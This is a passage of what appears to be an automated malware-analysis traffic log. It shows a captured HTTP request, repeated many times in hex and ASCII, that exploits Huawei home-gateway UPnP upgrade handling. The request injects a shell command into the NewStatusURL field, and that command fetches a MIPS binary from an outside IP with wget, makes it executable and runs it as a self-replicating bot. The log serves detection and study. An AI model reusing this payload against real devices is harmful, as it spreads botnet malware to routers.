62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 